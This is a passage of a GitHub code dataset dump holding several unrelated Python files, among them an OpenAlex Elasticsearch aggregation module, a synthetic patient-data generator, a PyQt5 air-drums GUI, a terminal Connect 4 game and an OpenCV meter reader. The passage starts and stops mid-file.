[{\"sub_key\": {\"terms\": {\"field\": group_by_field}}}]\n\n composite_agg = A(\"composite\", sources=sources, size=params[\"per_page\"])\n\n if after_key:\n composite_agg.after = after_key\n\n # handle missing value\n if known and missing is not None:\n s = s.filter(\"bool\", must=[{\"exists\": {\"field\": group_by_field.es_field()}}])\n s.aggs.bucket(bucket_keys[\"default\"], composite_agg)\n return s\n\n\ndef create_default_group_by_buckets(\n bucket_keys, group_by_field, known, missing, per_page, s, shard_size\n):\n a = A(\n \"terms\",\n field=group_by_field,\n size=per_page,\n shard_size=shard_size,\n )\n if not known:\n a.missing = missing\n s.aggs.bucket(bucket_keys[\"default\"], a)\n return s\n\n\ndef determine_shard_size(q):\n return 5000 if q else 3000\n\n\ndef get_missing(field):\n if (\n type(field).__name__ == \"RangeField\"\n or type(field).__name__ == \"BooleanField\"\n or field.param == \"ids.crossref\"\n ):\n missing = -111\n else:\n missing = \"unknown\"\n return missing\n\n\ndef filter_by_repository_or_journal(field, s):\n if (\n field.param == \"repository\"\n or field.param == \"locations.source.host_institution_lineage\"\n ):\n s = s.filter(\"term\", **{\"locations.source.type\": \"repository\"})\n if field.param == \"journal\":\n s = s.filter(\"term\", **{\"primary_location.source.type\": \"journal\"})\n return s\n\n\n\"\"\"\nBucket retrieval.\n\"\"\"\n\n\ndef get_default_buckets(group_by, response):\n bucket_keys = get_bucket_keys(group_by)\n buckets = response.aggregations[bucket_keys[\"default\"]].buckets\n buckets = transform_paginated_buckets(buckets)\n return buckets\n\n\ndef transform_paginated_buckets(buckets):\n \"\"\"\n Paginated buckets (composite) have a different structure than non-paginated buckets.\n Convert the paginated buckets to the same structure as non-paginated buckets.\n \"\"\"\n for b in buckets:\n if isinstance(b.key, AttrDict):\n b.key = b.key[\"sub_key\"]\n return buckets\n\n\ndef buckets_to_keep(buckets, group_by):\n if group_by.endswith(\"host_institution_lineage\"):\n buckets = keep_institution_buckets(buckets)\n elif group_by.endswith(\"publisher_lineage\"):\n buckets = keep_publisher_buckets(buckets)\n return buckets\n\n\ndef filter_buckets_by_key_start(buckets, key_prefix):\n return [\n b\n for b in buckets\n if b[\"key\"] and (b[\"key\"].startswith(key_prefix) or b[\"key\"] == \"unknown\")\n ]\n\n\ndef keep_institution_buckets(buckets):\n return filter_buckets_by_key_start(buckets, \"https://openalex.org/I\")\n\n\ndef keep_publisher_buckets(buckets):\n return filter_buckets_by_key_start(buckets, \"https://openalex.org/P\")\n\n\ndef get_bucket_doc_count(group_by, response, bucket_key):\n bucket_keys = get_bucket_keys(group_by)\n return response.aggregations[bucket_keys[bucket_key]].doc_count\n\n\ndef exists_bucket_count(group_by, response):\n return get_bucket_doc_count(group_by, response, \"exists\")\n\n\ndef not_exists_bucket_count(group_by, response):\n return get_bucket_doc_count(group_by, response, \"not_exists\")\n","repo_name":"ourresearch/openalex-elastic-api","sub_path":"core/group_by/buckets.py","file_name":"buckets.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"96"} +{"seq_id":"71365911995","text":"import datetime\nimport json\nimport random\nfrom random import randrange\n\nimport pandas as pd\n\ni = 1\nlstConds = []\nlstCondTypes = [\"infectious disease\", \"deficiency disease\", \"hereditary disease\", \"physiological disease\"] \nj = 1\nlstTherapies = []\nlstTherapyTypes = [\"cognitive-behavioral therapy\", \"dialectical behavior therapy\", \"exposure therapy\", \"interpersonal therapy\", \"psychodynamic therapy\"]\nk = 1\nlstPatients = []\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/conditions.txt\") as file:\n for line in file:\n lstConds.append(\n {'id': i, 'name': line.rstrip(), 'type': random.choice(lstCondTypes)})\n i += 1\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/therapies.txt\") as file:\n for line in file:\n lstTherapies.append(\n {'id': 'th'+str(j), 'name': line.rstrip(), 'type': random.choice(lstTherapyTypes)})\n j += 1\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/nameshort.txt\") as file:\n for line in file:\n i = 1\n conditionCount = randrange(1, 20)\n lstTrials = []\n lstPreConds = []\n finishedConds = []\n for x in range(conditionCount):\n startDate = datetime.datetime(2015, 1, 1)\n nextTrial = randrange(5000)\n endDate = startDate + datetime.timedelta(days=nextTrial)\n timeStampStart = str(startDate.year) + \\\n str(startDate)[5:7] + str(startDate)[8:10]\n timeStampEnd = str(endDate.year) + \\\n str(endDate)[5:7] + str(endDate)[8:10]\n therapyIndex = randrange(len(lstTherapies))\n success = randrange(70, 101)\n conditionID = 'pc' + str(randrange(4))\n if conditionID not in finishedConds:\n trialDict = {'id': 'tr'+str(i), 'start': timeStampStart, 'end': timeStampEnd,\n 'condition': conditionID, 'therapy': lstTherapies[therapyIndex]['id'], 'successful': success}\n lstTrials.append(trialDict)\n if success == 100:\n finishedConds.append(conditionID)\n i += 1\n # preconditions\n dfx = pd.DataFrame(lstTrials)\n try:\n groupedConds = dfx.groupby(\"condition\", as_index=False).agg(\n start=(\"start\", \"min\"),\n end=(\"end\", \"max\"),\n success=(\"successful\", \"max\"))\n indexMax = len(groupedConds.index)\n for ind in range(0, indexMax):\n conditionIndex = randrange(len(lstConds))\n if groupedConds.iloc[ind]['success'] == 100:\n lstPreConds.append({'id': groupedConds.iloc[ind]['condition'], 'diagnosed': groupedConds.iloc[ind]\n ['start'], 'cured': groupedConds.iloc[ind]['end'], 'kind': lstConds[conditionIndex]['id']})\n else:\n lstPreConds.append(\n {'id': groupedConds.iloc[ind]['condition'], 'diagnosed': groupedConds.iloc[ind]['start'], 'cured': \"\", 'kind': lstConds[conditionIndex]['id']})\n except:\n print(\"no conditions for patient\")\n lstPatients.append(\n {'id': k, 'name': line.rstrip(), 'conditions': lstPreConds, 'trials': lstTrials})\n k += 1\n print(line)\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/dataset.JSON\", \"w\") as jsonFile:\n myJSON = {'Conditions': lstConds, 'Therapies': lstTherapies, 'Patients': lstPatients}\n finalJSON = json.dumps(myJSON, indent=4)\n print(len(finalJSON))\n jsonFile.write(finalJSON)\n","repo_name":"Benedekkiraly/patient-therapy-recommending","sub_path":"create_dataset/build_JSON.py","file_name":"build_JSON.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74002586555","text":"\"\"\"\nIn this example, we demonstrate how to create simple camera viewer using Opencv3 and PyQt5\n\nAuthor: Berrouba.A\nLast edited: 21 Feb 2018\n\"\"\"\n\n# import system module\nimport sys\n\n# import some PyQt5 modules\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog ,QSlider, QCommonStyle, QStyle, QDialog\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtGui import QImage\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5 import QtMultimedia\n\n# import Opencv module\nimport cv2\n\nfrom ui_main_window1 import *\nfrom ui_opening_window import *\nimport iot_drums as iot\n\n\nclass OpeningWindow(QDialog):\n # class constructor\n def __init__(self):\n # call QWidget constructor\n super().__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.setWindowTitle(\"Air Drums\")\n\n self.ui.pushButton.clicked.connect(self.MoveToMainWindow)\n\n def MoveToMainWindow(self):\n mainWindow = MainWindow()\n size = mainWindow.size()\n widget.addWidget(mainWindow)\n widget.setCurrentIndex(widget.currentIndex() + 1)\n widget.resize(size)\n\n\nclass MainWindow(QMainWindow):\n # class constructor\n def __init__(self):\n # call QWidget constructor\n super().__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.setWindowTitle(\"Air Drums\")\n\n # create a timer\n self.timer = QTimer()\n # set timer timeout callback function\n self.timer.timeout.connect(self.putStream)\n # set control_bt callback clicked function\n self.iot = self.init_iot_drums()\n self.player = QtMultimedia.QMediaPlayer()\n self.initGui()\n\n def initGui(self):\n self.ui.start_bt.clicked.connect(self.controlTimer)\n self.ui.actionPlay_Song.triggered.connect(self.playSong)\n self.ui.actionCalibrate.triggered.connect(self.iot.vs.calibrate_sticks)\n self.ui.songVolumeSlider.valueChanged[int].connect(self.changeVolume)\n self.setWindowIcon(QtGui.QIcon('icon.png'))\n self.ui.bt_vol_icon.setIcon(self.style().standardIcon(QStyle.SP_MediaVolume))\n self.ui.actionCalibrate_Leg.triggered.connect(self.iot.vs.calibrate_leg)\n self.ui.actionSave_Calibration.triggered.connect(self.iot.vs.save_calibration)\n self.ui.actionFinish_Sticks_Calibration.triggered.connect(self.iot.vs.finish_calibrate)\n self.ui.left_bt.setIcon(self.style().standardIcon(QStyle.SP_ArrowLeft))\n self.ui.right_bt.setIcon(self.style().standardIcon(QStyle.SP_ArrowRight))\n self.ui.left_bt.clicked.connect(lambda: self.changeStream(-1))\n self.ui.right_bt.clicked.connect(lambda: self.changeStream(1))\n self.ui.checkBox_Arduino.stateChanged.connect(lambda: self.set_Arduino(self.ui.checkBox_Arduino.isChecked()))\n self.ui.checkBox_MIDI.stateChanged.connect(lambda: self.set_MIDI(self.ui.checkBox_MIDI.isChecked()))\n self.ui.checkBox_Depth.stateChanged.connect(lambda: self.iot.pm.set_isDepthOn(self.ui.checkBox_Depth.isChecked()))\n self.ui.checkBox_circle_sticks.stateChanged.connect(lambda: self.iot.setDrawSticks(self.ui.checkBox_circle_sticks.isChecked()))\n\n\n def set_MIDI(self, MIDI_state):\n self.iot.pm.is_midi = MIDI_state\n if MIDI_state:\n self.iot.pm.open_port()\n else:\n self.iot.pm.close_port()\n\n def set_Arduino(self, Arduino_state):\n if Arduino_state:\n self.iot.pm.arduino_config(Arduino_state)\n else:\n self.iot.pm.close_arduino()\n\n\n def init_iot_drums(self):\n self.stream_num=0\n self.streams_name = [\"Sticks Stream\", \"Leg Stream\", \"Depth Stream\"]\n return iot.iot_drums()\n\n def changeVolume(self, value):\n self.player.setVolume(value)\n\n def changeStream(self,x):\n self.stream_num = (self.stream_num+x) % 3\n self.ui.stream_label.setText(self.streams_name[self.stream_num])\n\n\n def putStream(self):\n color_frame, secondary_frames = self.iot.iteration()\n color_frame = cv2.cvtColor(color_frame, cv2.COLOR_BGR2RGB)\n sec_frame = cv2.cvtColor(secondary_frames[self.stream_num], cv2.COLOR_BGR2RGB)\n\n height, width, channel = color_frame.shape\n step = channel * width\n # create QImage from image\n qImg_stream1 = QImage(color_frame.data, width, height, step, QImage.Format_RGB888)\n qImg_stream2 = QImage(sec_frame.data, width, height, step, QImage.Format_RGB888)\n # show image in img_label\n self.ui.stream1.setPixmap(QPixmap.fromImage(qImg_stream1))\n self.ui.stream1.mousePressEvent = self.getPixel\n\n self.ui.stream2.setPixmap(QPixmap.fromImage(qImg_stream2))\n #for expanding\n #self.ui.stream1.setScaledContents(True)\n #self.ui.stream1.setSizePolicy(QtWidgets.QSizePolicy.Ignored,QtWidgets.QSizePolicy.Ignored)\n\n\n\n def getPixel(self, event):\n x = event.pos().x()\n y = event.pos().y()\n self.iot.vs.calibrate_callback(x,y)\n\n\n # start/stop timer\n def controlTimer(self):\n # if timer is stopped\n if not self.timer.isActive():\n # create video capture\n self.cap = cv2.VideoCapture(0)\n # start timer\n self.timer.start()\n # update control_bt text\n self.ui.start_bt.setText(\"Stop\")\n # if timer is started\n else:\n # stop timer\n self.timer.stop()\n # release video capture\n self.cap.release()\n # update control_bt text\n self.ui.start_bt.setText(\"Start\")\n\n def playSong(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n files, _ = QFileDialog.getOpenFileNames(self, \"QFileDialog.getOpenFileNames()\", \"\",\n \"All Files (*);;Python Files (*.py)\", options=options)\n if files:\n print(files)\n url = QtCore.QUrl.fromLocalFile(*files)\n content = QtMultimedia.QMediaContent(url)\n self.player.setMedia(content)\n self.player.play()\n self.player.setVolume(int(self.ui.songVolumeSlider.value()))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n # create and show mainWindow\n widget = QtWidgets.QStackedWidget()\n #mainWindow = MainWindow()\n openingWindow = OpeningWindow()\n widget.addWidget(openingWindow)\n #widget.addWidget(mainWindow)\n widget.resize(openingWindow.size())\n widget.show()\n\n #mainWindow.show()\n\n sys.exit(app.exec_())","repo_name":"almog-a/iot_drums-","sub_path":"src/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5531807312","text":"def main():\n print('i=?')\n pi = int(input())\n print('n=?')\n n = int(input())\n print('a['+str(n)+']=?')\n a = [int(i) for i in input().split(' ')]\n\n pivot(a, pi)\n \n print(a)\n\ndef pivot(a, pi):\n smaller = 0\n equal = 0\n larger = len(a)\n\n pivot = a[pi]\n\n while (equal < larger):\n if a[equal] < pivot:\n a[smaller], a[equal] = a[equal], a[smaller]\n smaller, equal = smaller + 1, equal + 1\n elif a[equal] == pivot:\n equal += 1\n else: \n larger -= 1\n a[equal], a[larger] = a[larger], a[equal]\n\n\nif __name__ == '__main__':\n main()","repo_name":"kezarmader/pythonPractice","sub_path":"dutch_flag_v1.py","file_name":"dutch_flag_v1.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20829197095","text":"\"\"\"\nAuthor: Novanator 2012\nProgram: Translation\n\"\"\"\n\n\nclass Queue(object):\n\n class __Node(object):\n def __init__(self,value):\n self.value = value\n self.next=None\n\n \n def __init__(self):\n self.__first=None\n self.__last=None\n \n def put(self, x):\n p = Queue.__Node(x)\n if self.__first==None:\n self.__first = p\n self.__last = p\n else:\n tmp = self.__last \n tmp.next = p \n self.__last = p \n \n def get(self):\n if self.__first!=None:\n x = self.__first.value\n self.__first = self.__first.next\n return x\n return None\n\n def isempty(self):\n if self.__first==None:\n return True\n else:\n return False\n\n def show(self):\n p=self.__first\n while p != None:\n print(p.value,end=\" \")\n p = p.next\n\nclass Translate:\n def __init__(self,swe,swa):\n self.swe=swe\n self.swa=swa\n\nf=open(\"swabadoo.txt\",\"r\")\nif f!=\"\":\n print(\"Wordlist read!\")\nq=Queue()\nlist=[]\nword=f.readline()\nwhile word!=\"\":\n word=word.strip()\n list.append(word)\n word=f.readline()\n\nfor i in range(0,14,2):\n g=Translate(list[i],list[i+1])\n q.put(g)\n\nwhile not q.isempty():\n glossary=q.get()\n print(\"Translate to Swabadoo:\",glossary.swe)\n answer=input(\"\")\n if answer != glossary.swa:\n print(\"No, the right answer is: \",glossary.swa)\n q.put(glossary) \n else:\n print(\"Correct!\")\n \n\n \n \n \n \n \n\n\n\n\n\n\n\n\n \n","repo_name":"novanator/translation-py","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42277479004","text":"import pandas as pd\nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef VectorisedLinearRegression(X, Y):\n\tX_T = np.transpose(X)\n\ttobe_inv = np.dot(X_T, X)\n\tinv = np.linalg.inv(tobe_inv)\n\tA = np.dot(inv, X_T)\n\tweights = np.dot(A, Y)\n\n\treturn weights\n\ndata = pd.read_excel('data.xlsx')\ndata = (data - data.mean())/data.std()\ndata = np.c_[np.ones(data.shape[0]), data]\ndata = pd.DataFrame(data)\ndata.columns = ['x0', 'x1', 'x2', 'y']\nX = np.array(data.loc[:,['x0', 'x1', 'x2']])\nY = np.array(data['y'])\n\nweights = VectorisedLinearRegression(X, Y)\n\nprint(weights)","repo_name":"maneeshsistla8/NNFL-Implementations","sub_path":"Assignment1/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"18857478302","text":"import os, re, time, random, keyboard, math, platform\n\nif platform.system() == \"Windows\":\n pass\nelse:\n try:\n os.system(\"stty -echo\") #makes text entered in terminal invisible\n except:\n pass\n\ntry:\n height = int(re.search(\"(\\d+)\\)\", str(os.get_terminal_size())).group(1))-1 #the terminal needs -1 because uh\n width = int(re.search(\"(\\d+),\", str(os.get_terminal_size())).group(1))\nexcept OSError: #if not ran in terminal\n print(\"This game should be played in the terminal.\")\n time.sleep(2)\n height = 14\n width = 30\n # exit()\n\nif height < 14 or width < 30:\n print(\"The terminal size should be at least 30x14 (width x height)\")\n time.sleep(2)\n\n#variables and lists\narray = [\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n]\n# 0 - nothing\n\ncursor = 1 #cursor or arrow position\nisexit = False\nturn = 1 # 1 - player 1's turn, etc\nupdate = 0 # need to update??\nxoffset = \" \"*(math.floor((width - 29) / 2))\nyoffset = math.floor((height - 13) / 2)-1\nwin = 0\n\n\n#Key listners and actions\n\ndef keyright(x):\n global cursor, update\n \n if cursor < 7:\n cursor = cursor + 1\n update = 1\n\ndef keyleft(x):\n global cursor, update\n\n if cursor > 1:\n cursor = cursor - 1\n update = 1\n\ndef quitgame(x):\n global isexit\n isexit = True\n update = 1\n \n\ndef place(x):\n global turn, array, cursor, update\n \n if win == 0 and \"0\" in array[0]:\n if array[0][cursor-1] == \"0\": #if the thing isnt full\n for i in range(0, 6):\n if array[5-i][cursor-1] == \"0\":\n array[5-i][cursor-1] = str(turn).replace(\"1\", \"●\").replace(\"2\", \"○\")\n break\n if i == 6:\n no = True\n break\n\n if turn == 1:\n turn = 2\n else:\n turn = 1\n checkwin()\n update = 1\n else:\n\n reset()\n update = 1\n\ndef reset():\n global array, turn, win\n win = 0\n array = [\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\", \"0\", \"0\"],\n ]\n turn = 1\n cursor = 0\n\ndef checkwin():\n global array, update, win\n\n #vertical\n for i in range(0, 3):\n for ii in range(0, 7):\n if array[i][ii] + array[i+1][ii] + array[i+2][ii] + array[i+3][ii] == \"●●●●\":\n win = 1\n break\n if array[i][ii] + array[i+1][ii] + array[i+2][ii] + array[i+3][ii] == \"○○○○\":\n win = 2\n break\n \n #horizontal\n for i in range(0, 4):\n for ii in range(0, 6):\n if array[ii][i] + array[ii][i+1] + array[ii][i+2] + array[ii][i+3] == \"●●●●\":\n win = 1\n break\n if array[ii][i] + array[ii][i+1] + array[ii][i+2] + array[ii][i+3] == \"○○○○\":\n win = 2\n break\n \n # diagonal (left up to right down)\n for i in range(0, 4):\n for ii in range(0, 3):\n if array[ii][i] + array[ii+1][i+1] + array[ii+2][i+2] + array[ii+3][i+3] == \"●●●●\":\n win = 1\n break\n if array[ii][i] + array[ii+1][i+1] + array[ii+2][i+2] + array[ii+3][i+3] == \"○○○○\":\n win = 2\n break\n\n # diagonal (right up to left down)\n for i in range(0, 4):\n for ii in range(0, 3):\n if array[5-ii][i] + array[4-ii][i+1] + array[3-ii][i+2] + array[2-ii][i+3] == \"●●●●\":\n win = 1\n break\n if array[5-ii][i] + array[4-ii][i+1] + array[3-ii][i+2] + array[2-ii][i+3] == \"○○○○\":\n win = 2\n break\n\n\nkeyboard.on_press_key(\"right arrow\", keyright)\nkeyboard.on_press_key(\"left arrow\", keyleft)\nkeyboard.on_press_key(\"space\", place)\nkeyboard.on_press_key(\"e\", quitgame)\n\n\n\ndef printline(x):\n if x == 1 or x == 8:\n print(xoffset + \" ━╋━━━━━━━━━━━━━━━━━━━━━╋━\")\n elif x >= 2 and x <= 7:\n line = [' ', ' ', ' ', '┃', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', ' ', '·', ' ', '┃', ' ']\n fline = []\n count = 0\n for i in range(0, len(line)):\n if line[i] == \"·\":\n fline.append(re.sub(\"(·)\", array[x-2][count].replace(\"0\", \"·\").replace(\"1\", \"●\").replace(\"2\", \"○\"), line[i], count=1, flags=0))\n count = count+1\n else:\n fline.append(line[i])\n print(xoffset + \"\".join(fline))\n elif x == 10:\n print(xoffset + \" \"+\" \"*cursor+\"▲\")\n elif x == 9:\n print(xoffset + \" 1 2 3 4 5 6 7\")\n else:\n if win == 0:\n if \"0\" in array[0]:\n if turn == 1:\n print(\"\\n\"+xoffset+\"P1 - ● (P1's turn)\"+\"\\n\"+xoffset+\"P2 - ○\")\n else:\n print(\"\\n\"+xoffset+\"P1 - ●\"+\"\\n\"+xoffset+\"P2 - ○ (P2's turn)\")\n else:\n print(\"\\n\"+xoffset+\" Draw!\"+\"\\n\"+xoffset+\" Press space to play again!\")\n else:\n print(\"\\n\"+xoffset+\" ★ Player \"+str(win)+\" has won ★\"+\"\\n\"+xoffset+\" Press space to play again!\")\n\n# main thing\n\nwhile True:\n for i in range(0, yoffset+2):\n print(\"\\n\")\n for i in range(1, 12):\n printline(i)\n for i in range(0, yoffset-2):\n print(\"\\n\")\n \n update = 0\n while update == 0:\n pass\n if isexit == True:\n exit()\n\n","repo_name":"TheSavageTeddy/TerminalGames","sub_path":"connect4.py","file_name":"connect4.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26909223867","text":"import os\nimport random\nfrom tools.file_util import load_dataset, save_json\n\ndef _get_combine(data):\n resuts = {}\n for case in data:\n text1 = case['text1']\n text2 = case['text2']\n label = case['label']\n\n if text1 not in resuts:\n resuts[text1] = {}\n resuts[text1][label] = text2\n return resuts\n\ndef _get_simcse_example(data_combine):\n results = []\n example_set = set([])\n\n for text1, infos in data_combine.items():\n if \"0\" not in infos or \"1\" not in infos:\n continue\n\n text2 = infos[\"1\"]\n text3 = infos[\"0\"]\n temp1 = text1 + text2 + text3\n temp2 = text2 + text1 + text3\n\n if temp1 in example_set or temp2 in example_set:\n continue\n example_set.add(temp1)\n case = {\n \"text1\": text1,\n \"text2\": text2,\n \"text3\": text3\n }\n results.append(case)\n return results\n\n\ndef prepare_simcse(data):\n data_combine = _get_combine(data)\n print(\"data_combin={}\".format(len(data_combine)))\n simcse_examples = _get_simcse_example(data_combine)\n print(\"simcse_examples={}\".format(len(simcse_examples)))\n return simcse_examples\n\n\nif __name__ == '__main__':\n dirs = ['bq_corpus', 'lcqmc', 'paws-x-zh']\n subsets = [\"train\", \"dev\"]\n\n filedir = \"data/simcse/\"\n if not os.path.exists(filedir):\n os.mkdir(filedir)\n\n train_data = []\n dev_data = []\n for dir in dirs:\n datasets = load_dataset(dir, subsets=subsets)\n train_data += datasets[0]\n dev_data += datasets[1]\n print(\"train_data={}, dev_data={}\".format(len(train_data), len(dev_data)))\n\n train_file = filedir + \"train.json\"\n train_simcse_examples = prepare_simcse(train_data)\n random.shuffle(train_simcse_examples)\n save_json(train_simcse_examples, train_file)\n\n dev_file = filedir + \"dev.json\"\n dev_simcse_examples = prepare_simcse(dev_data)\n random.shuffle(dev_simcse_examples)\n save_json(dev_simcse_examples, dev_file)\n\n\n","repo_name":"xxyliuyang/qianyan_similarity","sub_path":"data_process/prepare_simcse_data.py","file_name":"prepare_simcse_data.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"948319103","text":"import os\r\nimport cv2\r\nimport json\r\nimport numpy as np\r\nfrom datetime import datetime\r\nfrom meter_digits_recognizer import MeterDigitsRecognizer\r\n\r\nPACKAGE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n\r\ndef rotate_image(image, angle_deg):\r\n image_center = tuple((np.array(image.shape[1::-1]) - 1.0) / 2)\r\n rot_mat = cv2.getRotationMatrix2D(image_center, angle_deg, 1.0)\r\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\r\n return result\r\n\r\nclass AutomaticMeterReader:\r\n \r\n def __init__(self, camera_model, meter_model):\r\n self.camera_model = camera_model\r\n self.meter_model = meter_model\r\n \r\n with open(os.path.join(PACKAGE_DIR, \"cameras\", \"%s.json\" % (self.camera_model)), \"r\") as f:\r\n camcalib = json.load(f)\r\n self.camera_matrix = np.resize(np.array(camcalib[\"camera_matrix\"]), (3, 3))\r\n self.distortion_coefs = np.resize(np.array(camcalib[\"distortion_coefs\"]), (1, len(camcalib[\"distortion_coefs\"])))\r\n self.new_camera_matrix = np.resize(np.array(camcalib[\"new_camera_matrix\"]), (3, 3))\r\n \r\n with open(os.path.join(PACKAGE_DIR, \"meter_models\", meter_model, \"meter_config.json\"), \"r\") as f:\r\n self.meter_config = json.load(f)\r\n self.template_imgs = []\r\n for template_conf in self.meter_config[\"templates\"]:\r\n template_img = cv2.imread(os.path.join(PACKAGE_DIR, \"meter_models\", self.meter_model, template_conf[\"file\"]))\r\n self.template_imgs.append(template_img)\r\n \r\n self.mdr = MeterDigitsRecognizer()\r\n self.img_original = None\r\n self.img_undistorted = None\r\n self.img_aligned = None\r\n self.img_debug = None\r\n\r\n def readout(self, img):\r\n self.img_original = img\r\n self.undistort_and_prepare()\r\n self.align_image()\r\n self.get_measurement()\r\n self.make_debug_image()\r\n return self.measurement\r\n \r\n def undistort_and_prepare(self):\r\n self.img_undistorted = cv2.undistort(self.img_original, self.camera_matrix, self.distortion_coefs, None, self.new_camera_matrix)\r\n # TODO: Integrate into new_camera_matrix\r\n if \"pre_rotation_angle_deg\" in self.meter_config:\r\n self.img_undistorted = rotate_image(self.img_undistorted.copy(), self.meter_config[\"pre_rotation_angle_deg\"])\r\n if \"pre_crop\" in self.meter_config:\r\n x0, y0, dx, dy = self.meter_config[\"pre_crop\"]\r\n x1, y1 = min(self.img_undistorted.shape[1], x0 + dx), min(self.img_undistorted.shape[0], y0 + dy)\r\n self.img_undistorted = self.img_undistorted[y0:y1, x0:x1]\r\n \r\n def align_image(self):\r\n src_points, dst_points = [], []\r\n for template_conf, template_img in zip(self.meter_config[\"templates\"], self.template_imgs):\r\n x0, y0, dx, dy = template_conf[\"roi\"]\r\n\r\n match = cv2.matchTemplate(self.img_undistorted, template_img, cv2.TM_CCORR_NORMED)\r\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(match)\r\n top_left = max_loc\r\n\r\n src_points.append((top_left[0] + 0.5 * dx - 0.5, top_left[1] + 0.5 * dy - 0.5))\r\n dst_points.append((x0 + 0.5 * dx - 0.5, y0 + 0.5 * dy - 0.5))\r\n\r\n M = cv2.getAffineTransform(np.float32(src_points), np.float32(dst_points))\r\n self.img_aligned = cv2.warpAffine(self.img_undistorted, M, (self.img_undistorted.shape[1], self.img_undistorted.shape[0]), flags=cv2.INTER_LINEAR)\r\n\r\n def get_measurement(self):\r\n digit_imgs = []\r\n for i, digit_conf in enumerate(self.meter_config[\"register\"][\"digits\"]):\r\n x0, y0, dx, dy = digit_conf[\"roi\"]\r\n digit_img = self.img_aligned[y0:y0+dy, x0:x0+dx]\r\n digit_imgs.append(digit_img)\r\n predictions, confidences = self.mdr.run(digit_imgs)\r\n \r\n res = 0.0\r\n digits = self.meter_config[\"register\"][\"digits\"]\r\n for i, digit_conf in enumerate(digits):\r\n if predictions[i] == 10:\r\n if i + 1 < len(digits):\r\n res = None\r\n break\r\n res += digit_conf[\"multiplier\"] * predictions[i]\r\n \r\n self.digit_imgs = digit_imgs\r\n self.predictions = predictions\r\n self.confidences = confidences\r\n self.measurement = res\r\n \r\n def make_debug_image(self):\r\n res = self.img_aligned.copy()\r\n stamp_str = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(\"stamp_str:\", stamp_str)\r\n\r\n # Templates\r\n for template_conf in self.meter_config[\"templates\"]:\r\n x0, y0, dx, dy = template_conf[\"roi\"]\r\n pen_width = 1.0\r\n cv2.rectangle(res, (x0 - 1, y0 - 1), (x0 + dx, y0 + dy), (255, 0, 0), 1)\r\n\r\n # Register\r\n #x0, y0, dx, dy = self.meter_config[\"register\"][\"roi\"]\r\n #cv2.rectangle(res, (x0 - 1, y0 - 1), (x0 + dx, y0 + dy), (0, 0, 255), 1)\r\n for digit_conf in self.meter_config[\"register\"][\"digits\"]:\r\n x0, y0, dx, dy = digit_conf[\"roi\"]\r\n cv2.rectangle(res, (x0 - 1, y0 - 1), (x0 + dx, y0 + dy), (0, 0, 255), 1)\r\n\r\n # Measurement\r\n x0, y0, dx, dy = self.meter_config[\"register\"][\"roi\"]\r\n font_size = 1.0 / 465.0 * 